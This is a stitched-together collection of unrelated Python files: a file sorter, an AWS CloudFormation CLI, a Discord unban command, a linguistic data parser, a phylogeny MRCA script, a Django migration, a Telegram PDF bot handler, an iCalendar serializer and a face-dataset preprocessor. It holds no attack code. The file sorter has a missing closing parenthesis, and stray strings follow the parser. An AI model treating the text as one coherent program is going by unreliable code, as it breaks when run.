shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".mov" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".qt" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".flv" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
if ".swf" in files and not os.path.exists(path+'Videos/'+files):
shutil.move(main_dir+'/'+files, path+'Videos/'+files)
# Documents
if ".pdf" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xps" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".doc" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".docx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".pptx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xlsx" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
if ".xml" in files and not os.path.exists(path+'Documents/'+files):
shutil.move(main_dir+'/'+files, path+'Documents/'+files)
# Software / Comperessed Packages
if ".exe" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".deb" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zip" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.gz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.xz" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".tar.bz2" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".iso" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".apk" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".app" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".7z" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".zipx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rpm" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".sitx" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".rar" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
if ".pkg" in files and not os.path.exists(path+'Softwares/'+files):
shutil.move(main_dir+'/'+files, path+'Softwares/'+files)
# System files
if ".cdd" in files and not os.path.exists(path+'System/'+files): # Conserved Domain Database
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dll" in files and not os.path.exists(path+'System/'+files): # Dynamic Link Library
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".dlc" in files and not os.path.exists(path+'System/'+files): # Dlc
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".bin" in files and not os.path.exists(path+'System/'+files): # Binary
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cab" in files and not os.path.exists(path+'System/'+files): # Windows Cabinet File
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".sh" in files and not os.path.exists(path+'System/'+files): # Shell Script
shutil.move(main_dir+'/'+files, path+'System/'+files)
if ".cgz" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".crash" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cur" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".deskthemepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".dmp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".drv" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ds_store" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fir" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fpbf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".fw" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".cpl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hlp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".hpj" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ico" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".idx" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".its" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".key" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".lnk" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log1" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".log2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".metadata_never_index" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mi4" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".mum" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nrl" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".nt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pbp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pdr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".pk2" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ppm_b" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".prefpane" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".rmt" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".ruf" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".savedsearch" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".saver" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".scr" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files
if ".sfcache" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".spi" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".swp" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".sys" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
if ".themepack" in files and not os.path.exists(path + 'System/' + files):
shutil.move(main_dir + '/' + files, path + 'System/' + files)
|
# An attempt to support python 2.7.x
from __future__ import print_function
import signal
import sys
import boto3
import botocore.exceptions
from stacks import aws, cf, cli
from stacks.config import config_load, print_config, validate_properties
#Uncomment to get extensive AWS logging from Boto3
#boto3.set_stream_logger('botocore', level='DEBUG')
def main():
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, handler)
parser, args = cli.parse_options()
if not args.subcommand:
parser.print_help()
sys.exit(0)
config_file = vars(args).get('config', None)
config_dir = vars(args).get('config_dir', None)
env = vars(args).get('env', None)
config = config_load(env, config_file, config_dir)
if args.subcommand == 'config':
print_config(config, args.property_name, output_format=args.output_format)
sys.exit(0)
config['get_ami_id'] = aws.get_ami_id
config['get_vpc_id'] = aws.get_vpc_id
config['get_zone_id'] = aws.get_zone_id
config['get_stack_output'] = aws.get_stack_output
config['get_stack_resource'] = aws.get_stack_resource
session_kwargs = {}
if args.profile:
session_kwargs['profile_name'] = args.profile
if args.region:
session_kwargs['region_name'] = args.region
try:
botosession = boto3.Session(**session_kwargs)
config['region'] = botosession.region_name
s3_conn = botosession.client('s3')
ec2_conn = botosession.resource('ec2')
vpc_conn = ec2_conn
r53_conn = botosession.client('route53')
cf_conn = botosession.client('cloudformation')
config['ec2_conn'] = ec2_conn
config['vpc_conn'] = vpc_conn
config['cf_conn'] = cf_conn
config['r53_conn'] = r53_conn
config['s3_conn'] = s3_conn
except botocore.exceptions.ClientError as e:
print(e)
sys.exit(1)
if args.subcommand == 'resources':
output = cf.stack_resources(cf_conn, args.name, args.logical_id)
if output:
print(output)
if args.subcommand == 'outputs':
output = cf.stack_outputs(cf_conn, args.name, args.output_name)
if output:
print(output)
if args.subcommand == 'list':
output = cf.list_stacks(cf_conn, args.name, args.verbose)
if output:
print(output)
if args.subcommand == 'create' or args.subcommand == 'update':
if args.property:
properties = validate_properties(args.property)
config.update(properties)
if args.subcommand == 'create':
cf.create_stack(cf_conn, args.name, args.template, config,
dry=args.dry_run, follow=args.events_follow)
else:
cf.create_stack(cf_conn, args.name, args.template, config,
update=True, dry=args.dry_run,
follow=args.events_follow, create_on_update=args.create_on_update)
if args.subcommand == 'delete':
cf.delete_stack(cf_conn, args.name, botosession.region_name, botosession.profile_name, args.yes)
if args.events_follow:
cf.get_events(cf_conn, args.name, args.events_follow, 10)
if args.subcommand == 'events':
cf.get_events(cf_conn, args.name, args.events_follow, args.lines)
def handler(signum, frame):
print('Signal {} received. Stopping.'.format(signum))
sys.exit(0)
|
import discord
import asyncio
from app.vars.client import client
from app.helpers import Notify, getUser
from discord.ext import commands
@client.command(aliases=['removeban','xunban','unbanid', 'unban_id', 'id_unban'])
@commands.guild_only()
@commands.has_permissions(ban_members=True)
async def unban(ctx, id):
notify = Notify(ctx=ctx, title='Unbaning Member...')
notify.prepair()
target = await getUser.byID(id)
await asyncio.sleep(0.3)
await ctx.guild.unban(target.user)
notify.success(content=f'You have successfully unbanned the user {target.user.display_name}!')
|
# coding: utf8
from __future__ import unicode_literals, print_function, division
from collections import OrderedDict
import re
from clldutils import jsonlib
from pylexibank.util import get_reference
VALUE_MAP = {
#'not done yet',
#'n/a',
#'no?',
#'yes',
#'check',
#'24',
#'1',
#'21',
#'no',
#'no info',
'approx 21': '21',
#'yes?',
#'0',
#'3',
#'2',
#'5',
#'4',
#'7',
#'6',
#'8',
#'2+',
#'unclear',
'yes, 3': '3',
'not clear': 'unclear',
'no applicable': 'n/a',
#'6-7',
#'11',
#'10',
#'13',
#'12',
#'15',
'maybe': 'unclear',
'no info.': 'no info',
#'36',
#'5+',
#'other',
}
def parse_dl(dl):
key = None
for tag in dl.children:
if tag.name == 'dt':
key = tag.get_text()
elif tag.name == 'dd':
if key not in ['id', 'name', 'tables']:
yield key, tag.get_text()
def rows(table):
keys = [th.get_text() for th in table.find('thead').find_all('th')]
rows = []
for tr in table.find('tbody').find_all('tr'):
tds = list(tr.find_all('td'))
assert len(tds) == len(keys)
values = []
for td in tds:
link, text = td.find('a'), td.get_text()
values.append((link['href'], text) if link else text)
rows.append(values)
return dict(header=keys, rows=rows)
def parse(soup, id_, outdir):
props = {'id': id_, 'name': soup.find('h2').get_text(), 'tables': {}}
for i, dl in enumerate(soup.find_all('dl')):
props.update(dict(list(parse_dl(dl))))
for frame in [
'basic_frame', 'flora_frame', 'cult_frame', 'grammar_frame', 'ethno_frame',
]:
div = soup.find('div', id=frame)
if div:
props['tables'][frame.split('_')[0]] = rows(div.find('table'))
jsonlib.dump(props, outdir.joinpath('{0}.json'.format(id_)), indent=4)
PAGES = re.compile('(?P<year>[0-9]{4})\s*(:|(,|\.)\s*p\.)\s*(?P<pages>[0-9]+(\-[0-9]+)?(,\s*[0-9]+(\-[0-9]+)?)*)\s*$')
AUTHOR_YEAR = re.compile('(?P<author>\w+)\s*(,|\-)?\s+(?P<year>[0-9]{4})$')
NAMEPART = '([A-Zvdcioy\xc1][BCDIMa-z\u1ef3\xe1\xe2\xe3\xe9\xe7\xed\xef\xfa\xf4\xf3\xfc\-\.]*([A-Z]\.)*)'
NAME = '(%s)(,?\s+%s)*' % (NAMEPART, NAMEPART)
AUTHORS = '(?P<authors>(%s)(\s+(&|and)\s+%s)*)' % (NAME, NAME)
AUTHORS_YEAR = re.compile('%s\s+(\((eds|(c|C)omp|recop|compiler)\.?\)\.?\s+)?\(?(?P<year>[0-9]{4})\)?([a-z])?((\.|,)?\s+)' % AUTHORS)
def get_authors(s):
s = re.sub('\s+and\s+', ' & ', s)
res = []
for v in s.split(' & '):
if ',' in v:
res.append(v.split(',')[0])
else:
res.append(v.split()[-1])
return ' and '.join(res)
def get_author_and_year(source):
match = AUTHORS_YEAR.match(source)
if match:
return (
get_authors(match.group('authors')),
match.group('year'),
source[match.end():].strip())
return None, None, source
def get_source_and_pages(source):
match = PAGES.search(source)
if match:
source = source[:match.start()]
source += match.group('year')
pages = match.group('pages')
else:
pages = None
match = AUTHOR_YEAR.match(source)
if match:
return (
match.group('author').replace(' & ', ' and '),
match.group('year'),
source[match.end():].strip(),
pages)
return None, None, source, pages
def itersources(item, lang, sources):
source = item.get('Source', '')
if source == 'See Language page':
source = lang['Data Sources']
source = source.strip()
source = source.replace('Huber, R.; Reed, R.', 'Huber, R. and Reed, R.')
if '\n\n' in source:
for vv in source.split('\n\n'):
if vv.strip():
authors, year, rem = get_author_and_year(vv.strip())
yield get_reference(authors, year, rem, None, sources)
elif ';' in source:
for vv in source.split(';'):
if vv.strip():
authors, year, rem, pages = get_source_and_pages(vv.strip())
yield get_reference(authors, year, rem, pages, sources)
else:
authors, year, rem = get_author_and_year(source)
yield get_reference(authors, year, rem, None, sources)
"kohI, kohhi7 “small intestine, waist, abdomen”"
"ĩík [swell], pux [pot boil over]"
|
import json, csv, os, argparse
def main():
parser = argparse.ArgumentParser(description='using a standard json formatted phylogeny file, finds time to most recent common ancestor for the oldest organisms in file. origin_time is used to find oldest organisms and to establish the time axis.')
parser.add_argument('-path', type=str, metavar='PATH', default = '', help='path to files - default : none (will read files in current directory)', required=False)
parser.add_argument('-file', type=str, metavar='NAME', default = 'lineageData.json', help='name of data file. default : lineageData.json', required=False)
parser.add_argument('-verbose', action='store_true', default = False, help='adding this flag will provide more text output while running (useful if you are working with a lot of data to make sure that you are not hanging) - default (if not set) : OFF', required=False)
args = parser.parse_args()
filePath = args.path
filename = args.file
fileName = filePath + filename
with open(filePath+filename, 'r') as fp:
data = json.load(fp)
parentData = {}
birthData = {}
lastBirthDate = -1
lineNumber = 0
print("loading data",end='')
for key in data:
if lineNumber%10000 == 0:
print('.',end='',flush=True)
lineNumber += 1
parentData[int(key)] = [int(p) for p in data[key]['ancestor_list']]
parentData[int(key)].sort()
birthData[int(key)] = int(data[key]['origin_time'])
lastBirthDate = max(lastBirthDate,birthData[int(key)])
print() # newline after all data has been loaded
print('last orgs were born at time',lastBirthDate,flush=True)
lastGenerationAncestors = {}
for ID in birthData:
if birthData[ID] == lastBirthDate:
lastGenerationAncestors[ID] = parentData[ID]
parentList = []
for ID in lastGenerationAncestors:
parentList.append(ID)
while 1:
if(args.verbose):
print("at time",birthData[parentList[0]],"... considering",len(parentList),"orgs.",parentList,flush = True)
newParentList = []
foundUnique = False # we have not found any unique parents lists
first = True
firstParentsList = []
for ID in parentList:
if first:
firstParentsList = parentData[ID]
first = False
else:
if parentData[ID] != firstParentsList:
foundUnique = True # we are not done
for parent in parentData[ID]:
if parent not in newParentList:
newParentList.append(parent)
parentList = newParentList
if(birthData[parentList[0]] == -1):
print('reached organism with time of birth -1. There is no MRCA(s)')
exit(1)
if not foundUnique: # all orgs do have the same parents list
oldestBirth = min([birthData[x] for x in parentList])
print('\nCoalescence found at time', oldestBirth, '\n ', lastBirthDate - oldestBirth,'time steps before oldest organism was born.\nMRCA(s) has ID(s):',parentList)
exit(1)
if __name__ == "__main__":
main()
|
import urllib.parse
def query_field(query, field):
field_spec = field in query
return (field_spec, query[field] if field_spec else '')
def unpack_id_list(l):
return [int(x) for x in
[_f for _f in urllib.parse.unquote_plus(l).split(',') if _f]]
|
# Generated by Django 2.2 on 2019-06-24 14:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("audits", "0010_auto_20190410_2241")]
operations = [
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_contentful_paint_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_contentful_paint_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_cpu_idle_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_cpu_idle_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_meaningful_paint_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_first_meaningful_paint_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_max_potential_first_input_delay_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_max_potential_first_input_delay_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_speed_index_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_speed_index_score",
field=models.FloatField(blank=True, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_tti_displayed_value",
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name="auditresults",
name="lh_metric_tti_score",
field=models.FloatField(blank=True, null=True),
),
]
|
from telegram.constants import MAX_FILESIZE_DOWNLOAD
from telegram.ext import CommandHandler, ConversationHandler, Filters, MessageHandler
from pdf_bot.consts import (
BACK,
BEAUTIFY,
BY_PERCENT,
BY_SIZE,
CANCEL,
COMPRESS,
COMPRESSED,
CROP,
DECRYPT,
ENCRYPT,
EXTRACT_PHOTO,
EXTRACT_TEXT,
OCR,
PDF_INFO,
PHOTOS,
PREVIEW,
RENAME,
ROTATE,
SCALE,
SPLIT,
TEXT_FILE,
TEXT_FILTER,
TEXT_MESSAGE,
TO_DIMENSIONS,
TO_PDF,
TO_PHOTO,
WAIT_CROP_OFFSET,
WAIT_CROP_PERCENT,
WAIT_CROP_TYPE,
WAIT_DECRYPT_PW,
WAIT_DOC_TASK,
WAIT_ENCRYPT_PW,
WAIT_EXTRACT_PHOTO_TYPE,
WAIT_FILE_NAME,
WAIT_PHOTO_TASK,
WAIT_ROTATE_DEGREE,
WAIT_SCALE_DIMENSION,
WAIT_SCALE_PERCENT,
WAIT_SCALE_TYPE,
WAIT_SPLIT_RANGE,
WAIT_TEXT_TYPE,
WAIT_TO_PHOTO_TYPE,
)
from pdf_bot.files.compress import compress_pdf
from pdf_bot.files.crop import (
ask_crop_type,
ask_crop_value,
check_crop_percent,
check_crop_size,
)
from pdf_bot.files.crypto import (
ask_decrypt_pw,
ask_encrypt_pw,
decrypt_pdf,
encrypt_pdf,
)
from pdf_bot.files.document import ask_doc_task
from pdf_bot.files.ocr import add_ocr_to_pdf
from pdf_bot.files.photo import (
ask_photo_results_type,
ask_photo_task,
get_pdf_photos,
get_pdf_preview,
pdf_to_photos,
process_photo_task,
)
from pdf_bot.files.rename import ask_pdf_new_name, rename_pdf
from pdf_bot.files.rotate import ask_rotate_degree, check_rotate_degree
from pdf_bot.files.scale import (
ask_scale_type,
ask_scale_value,
check_scale_dimension,
check_scale_percent,
)
from pdf_bot.files.split import ask_split_range, split_pdf
from pdf_bot.files.text import ask_text_type, get_pdf_text
from pdf_bot.language import set_lang
from pdf_bot.utils import cancel
def file_cov_handler():
conv_handler = ConversationHandler(
entry_points=[
MessageHandler(Filters.document, check_doc),
MessageHandler(Filters.photo, check_photo),
],
states={
WAIT_DOC_TASK: [MessageHandler(TEXT_FILTER, check_doc_task)],
WAIT_PHOTO_TASK: [MessageHandler(TEXT_FILTER, check_photo_task)],
WAIT_CROP_TYPE: [MessageHandler(TEXT_FILTER, check_crop_task)],
WAIT_CROP_PERCENT: [MessageHandler(TEXT_FILTER, check_crop_percent)],
WAIT_CROP_OFFSET: [MessageHandler(TEXT_FILTER, check_crop_size)],
WAIT_DECRYPT_PW: [MessageHandler(TEXT_FILTER, decrypt_pdf)],
WAIT_ENCRYPT_PW: [MessageHandler(TEXT_FILTER, encrypt_pdf)],
WAIT_FILE_NAME: [MessageHandler(TEXT_FILTER, rename_pdf)],
WAIT_ROTATE_DEGREE: [MessageHandler(TEXT_FILTER, check_rotate_degree)],
WAIT_SPLIT_RANGE: [MessageHandler(TEXT_FILTER, split_pdf)],
WAIT_TEXT_TYPE: [MessageHandler(TEXT_FILTER, check_text_task)],
WAIT_SCALE_TYPE: [MessageHandler(TEXT_FILTER, check_scale_task)],
WAIT_SCALE_PERCENT: [MessageHandler(TEXT_FILTER, check_scale_percent)],
WAIT_SCALE_DIMENSION: [MessageHandler(TEXT_FILTER, check_scale_dimension)],
WAIT_EXTRACT_PHOTO_TYPE: [
MessageHandler(TEXT_FILTER, check_get_photos_task)
],
WAIT_TO_PHOTO_TYPE: [MessageHandler(TEXT_FILTER, check_to_photos_task)],
},
fallbacks=[CommandHandler("cancel", cancel)],
allow_reentry=True,
)
return conv_handler
def check_doc(update, context):
doc = update.effective_message.document
if doc.mime_type.startswith("image"):
return ask_photo_task(update, context, doc)
if not doc.mime_type.endswith("pdf"):
return ConversationHandler.END
if doc.file_size >= MAX_FILESIZE_DOWNLOAD:
_ = set_lang(update, context)
update.effective_message.reply_text(
"{desc_1}\n\n{desc_2}".format(
desc_1=_("Your file is too big for me to download and process"),
desc_2=_(
"Note that this is a Telegram Bot limitation and there's "
"nothing I can do unless Telegram changes this limit"
),
),
)
return ConversationHandler.END
context.user_data[PDF_INFO] = doc.file_id, doc.file_name
return ask_doc_task(update, context)
def check_photo(update, context):
return ask_photo_task(update, context, update.effective_message.photo[-1])
def check_doc_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text == _(CROP):
return ask_crop_type(update, context)
if text == _(DECRYPT):
return ask_decrypt_pw(update, context)
if text == _(ENCRYPT):
return ask_encrypt_pw(update, context)
if text in [_(EXTRACT_PHOTO), _(TO_PHOTO)]:
return ask_photo_results_type(update, context)
if text == _(PREVIEW):
return get_pdf_preview(update, context)
if text == _(RENAME):
return ask_pdf_new_name(update, context)
if text == _(ROTATE):
return ask_rotate_degree(update, context)
if text in [_(SCALE)]:
return ask_scale_type(update, context)
if text == _(SPLIT):
return ask_split_range(update, context)
if text == _(EXTRACT_TEXT):
return ask_text_type(update, context)
if text == OCR:
return add_ocr_to_pdf(update, context)
if text == COMPRESS:
return compress_pdf(update, context)
if text == _(CANCEL):
return cancel(update, context)
return WAIT_DOC_TASK
def check_photo_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BEAUTIFY), _(TO_PDF)]:
return process_photo_task(update, context)
if text == _(CANCEL):
return cancel(update, context)
return WAIT_PHOTO_TASK
def check_crop_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BY_PERCENT), _(BY_SIZE)]:
return ask_crop_value(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_CROP_TYPE
def check_scale_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(BY_PERCENT), _(TO_DIMENSIONS)]:
return ask_scale_value(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_SCALE_TYPE
def check_text_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text == _(TEXT_MESSAGE):
return get_pdf_text(update, context, is_file=False)
if text == _(TEXT_FILE):
return get_pdf_text(update, context, is_file=True)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_TEXT_TYPE
def check_get_photos_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(PHOTOS), _(COMPRESSED)]:
return get_pdf_photos(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_EXTRACT_PHOTO_TYPE
def check_to_photos_task(update, context):
_ = set_lang(update, context)
text = update.effective_message.text
if text in [_(PHOTOS), _(COMPRESSED)]:
return pdf_to_photos(update, context)
if text == _(BACK):
return ask_doc_task(update, context)
return WAIT_TO_PHOTO_TYPE
|
from recurrent_ics.grammar.parse import ContentLine
from recurrent_ics.serializers.serializer import Serializer
class CalendarSerializer(Serializer):
def serialize_0version(calendar, container): # 0version will be sorted first
container.append(ContentLine("VERSION", value="2.0"))
def serialize_1prodid(calendar, container): # 1prodid will be sorted second
if calendar.creator:
creator = calendar.creator
else:
creator = "recurrent_ics.py - http://git.io/lLljaA"
container.append(ContentLine("PRODID", value=creator))
def serialize_calscale(calendar, container):
if calendar.scale:
container.append(ContentLine("CALSCALE", value=calendar.scale.upper()))
def serialize_method(calendar, container):
if calendar.method:
container.append(ContentLine("METHOD", value=calendar.method.upper()))
def serialize_event(calendar, container):
for event in calendar.events:
container.append(str(event))
def serialize_todo(calendar, container):
for todo in calendar.todos:
container.append(str(todo))
|
import h5py, cv2, os, random, argparse
from tqdm import tqdm
import numpy as np
class Process:
def __init__(self, data_path=None, filename=None):
self.filename = filename
self.data_path = data_path
self.prefix = "landmark_aligned_face." # every image name is prefixed with this string
# 5 folders to loop over, each folder text file contains information of other folders
self.folder_files = ['fold_0_data.txt', 'fold_1_data.txt', 'fold_2_data.txt', 'fold_3_data.txt',
'fold_4_data.txt']
# age category classes, there are 12 age groups
self.ages = ["(0, 2)", "(4, 6)", "(8, 12)", "(15, 20)", "(21, 24)", "(25, 32)",
"(33, 37)", "(38, 43)", "(44, 47)", "(48, 53)", "(54, 59)", "(60, 100)"]
# there are only 2 gender categories
self.genders = ['m', 'f']
# Since there are labels that do not match the classes stated, need to fix them
self.ages_to_fix = {'35': self.ages[6], '3': self.ages[0], '55': self.ages[10], '58': self.ages[10],
'22': self.ages[4], '13': self.ages[2], '45': self.ages[8], '36': self.ages[6],
'23': self.ages[4], '57': self.ages[10], '56': self.ages[10], '2': self.ages[0],
'29': self.ages[5], '34': self.ages[6], '42': self.ages[7], '46': self.ages[8],
'32': self.ages[5], '(38, 48)': self.ages[7], '(38, 42)': self.ages[7],
'(8, 23)': self.ages[2], '(27, 32)': self.ages[5]}
self.none_count = 0
self.no_age = 0
def get_image_paths(self, folder_file):
# one big folder list
folder = list()
folder_path = os.path.join(self.data_path, folder_file)
# start processing each folder text file
with open(folder_path) as text:
lines = text.readlines()
print("Total lines to be parsed from this document: ", len(lines))
# loop over all the lines ignoring the first line which contains metadata of the file contents
for line in lines[1:]:
line = line.strip().split("\t") # strip tab character from each line
# line[0] contains folder name, line[2] gives information of image id, line[1] gives exact image name
# construct image path with above information
img_path = line[0] + "/" + self.prefix + line[2] + "." + line[1] # real image path
# if the age group is not provided, and it is None, then increment None counter and continue to next
# image. Likewise, check if the gender is provided or not, if not then just continue
if line[3] == "None":
self.none_count += 1
continue
if line[4] == "u" or line[4] == "":
self.no_age += 1
continue
# We store useful metadata infos. for every right image, append the image along with
folder.append([img_path] + line[3:5])
if folder[-1][1] in self.ages_to_fix:
folder[-1][1] = self.ages_to_fix[folder[-1][1]]
random.shuffle(folder)
return folder
def imread(self, path, width, height):
img = cv2.imread(path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA)
return img
def aggregate_data(self, all_folders):
width, height = 227, 227
# loop for reading imgs from five folders
all_data = []
all_ages = []
all_genders = []
print("Start reading images data...")
for ind, folder in enumerate(all_folders):
data = []
ages = []
genders = []
for i in tqdm(range(len(folder))): # here using tqdm to monitor progress
img_path = self.data_path + os.path.join("/aligned", folder[i][0])
img = self.imread(img_path, width, height)
data.append(img)
ages.append(self.ages.index(folder[i][1]))
genders.append(self.genders.index(folder[i][2]))
all_data.append(data)
all_ages.append(ages)
all_genders.append(genders)
